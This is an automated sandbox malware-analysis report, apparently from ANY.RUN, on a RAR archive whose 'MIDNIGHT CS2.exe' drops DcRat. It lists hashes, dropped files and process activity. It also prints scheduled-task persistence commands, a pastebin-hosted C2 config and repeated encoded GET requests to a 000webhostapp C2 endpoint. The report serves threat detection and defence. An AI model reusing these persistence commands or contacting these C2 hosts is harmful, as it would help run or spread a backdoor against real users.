| File name: | CS2.rar |
| Full analysis: | https://app.any.run/tasks/3c46f4ae-9c95-42dc-9ca3-bfb1d87a6d85 |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | February 19, 2024, 18:27:35 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-rar |
| File info: | RAR archive data, v5 |
| MD5: | 288481F52BF788A8DECE265AF84D76B7 |
| SHA1: | D425135B8E0FAA9948B50F8B2AB4812D121291AB |
| SHA256: | A3E5B1E6887D0A9886D3F28712AF38D3856EA3DCFCF31DDF2B7B7C937F72B612 |
| SSDEEP: | 24576:jSmCcAbAXa4y3AJrzdUb4f1ZlhBnc6tQIKbHm3MskLUuSGsZ8/R:jSmCc4AXahwpzdUb4f1ZlhBnc6tQIKTX |
| .rar | | | RAR compressed archive (v5.0) (61.5) |
|---|---|---|
| .rar | | | RAR compressed archive (gen) (38.4) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1876 | "C:\blockportinto\BrowserBroker.exe" | C:\blockportinto\BrowserBroker.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 2044 | "C:\Users\admin\AppData\Local\Temp\Rar$EXb2472.24922\MIDNIGHT CS2.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXb2472.24922\MIDNIGHT CS2.exe | WinRAR.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2232 | schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\blockportinto\lsm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2472 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\CS2.rar" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 2564 | CHCP 437 | C:\Windows\System32\chcp.com | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Change CodePage Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2572 | schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\blockportinto\lsm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2648 | schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\blockportinto\lsm.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2672 | "C:\MSOCache\All Users\csrss.exe" | C:\MSOCache\All Users\csrss.exe | BrowserBroker.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 Modules
DcRat(PID) Process(2672) csrss.exe C2 (1)https://pastebin.com/raw/PXx6ZeVT Options MutexDCR_MUTEX-qNG6savcCCZ4gG8Ci2dM searchpath%UsersFolder% - Fast Targetals | |||||||||||||||
| 2692 | schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\csrss.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2964 | C:\Windows\system32\cmd.exe /c ""C:\blockportinto\9AJsWDUPB0I3aQGMRkcyJYs8Q.bat" " | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\CS2.rar | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (2472) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2044 | MIDNIGHT CS2.exe | C:\blockportinto\9AJsWDUPB0I3aQGMRkcyJYs8Q.bat | text | |
MD5:D33830E22073ACBCCF2D80975E0102FE | SHA256:91B531F73ECFE33A61ECB9378D8F57F2DA719BCB344B2D63FA26E1BD2600F97D | |||
| 1876 | BrowserBroker.exe | C:\blockportinto\101b941d020240 | text | |
MD5:A716AB9444542AC0A9F3D164653F9258 | SHA256:— | |||
| 2044 | MIDNIGHT CS2.exe | C:\blockportinto\qbnFBdoi7Bq5Dgp.vbe | vbe | |
MD5:2471F69FDCB3742EFF69DE6B3C36B3B3 | SHA256:F5DC668946079678906F9AC2212C0535D22BCC0C7AA8F2CBB5C2D310C51581E3 | |||
| 2472 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb2472.24922\MIDNIGHT CS2.exe | executable | |
MD5:1654B93A24715E4360B8513CE013F5C2 | SHA256:93664D09D34041B0FEC98004C0EED5B41B4711EF074C15B2D34A0D6A20232A29 | |||
| 1876 | BrowserBroker.exe | C:\blockportinto\lsm.exe | executable | |
MD5:2FEBC59762070CC4022BBD00FE1F92BF | SHA256:8496E933E93B0392C2537A4F967BFE650F73E91EE24426F2E1E53BFD38FC95A5 | |||
| 1876 | BrowserBroker.exe | C:\MSOCache\All Users\csrss.exe | executable | |
MD5:2FEBC59762070CC4022BBD00FE1F92BF | SHA256:8496E933E93B0392C2537A4F967BFE650F73E91EE24426F2E1E53BFD38FC95A5 | |||
| 2044 | MIDNIGHT CS2.exe | C:\blockportinto\BrowserBroker.exe | executable | |
MD5:2FEBC59762070CC4022BBD00FE1F92BF | SHA256:8496E933E93B0392C2537A4F967BFE650F73E91EE24426F2E1E53BFD38FC95A5 | |||
| 1876 | BrowserBroker.exe | C:\MSOCache\All Users\886983d96e3d3e | text | |
MD5:AC9DB32A31715D5F9B9A26CE3F87888E | SHA256:B40EA4E0D61B7464AC2A8F31FEA55A7788A19CE4420570FED3D8E777AC822E17 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?O7tIoYiqbFnt51n5fBkFKqKatcSA3=lCtk6Wi&hpI=nJxX7a7IztoythwSZLFiwQel&U4RXcd57YDBnVf2CvV1X51YjPnWkk8W=MXnfqvWPt0VevpDqMgB4m&2f4ad06a91d7d6618f46f514356d8066=85d3ab053e458f0cb3c5faff0e3018a6&da1fbc1cd5a69ef44588d7cba69f3912=QOkJGM0cTM0YGNwUjN1IDN1YGZ3QmMihDNkNjN3YTMjVGMhJjYwETY&O7tIoYiqbFnt51n5fBkFKqKatcSA3=lCtk6Wi&hpI=nJxX7a7IztoythwSZLFiwQel&U4RXcd57YDBnVf2CvV1X51YjPnWkk8W=MXnfqvWPt0VevpDqMgB4m | unknown | text | 2.09 Kb | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&ebe48df7063aaf50c194db1a0fb88c01=0VfiIiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIlFGO2ATM3MTZ0EWYxY2MiVGN5YzNxUmNxUjYzgDM5UWZhVjZ5MjN2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 2.09 Kb | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 104 b | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&58377049004914f1bec4d030d40c530b=QX9JSUmlWTuNGbOhlVnd3RiJEeGhFboJTWo5EMURVMFh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETp10Mi5GbtN2aG12Ymh3VaBnSulFak1WS2kUajxmTYZFdGdlWw4EbJN3dHJWM102TpNWbihGeVJGaWdEZUp0QMlGMXlFbSNzY21EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIlFGO2ATM3MTZ0EWYxY2MiVGN5YzNxUmNxUjYzgDM5UWZhVjZ5MjN2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 2.09 Kb | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 104 b | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 104 b | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 104 b | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3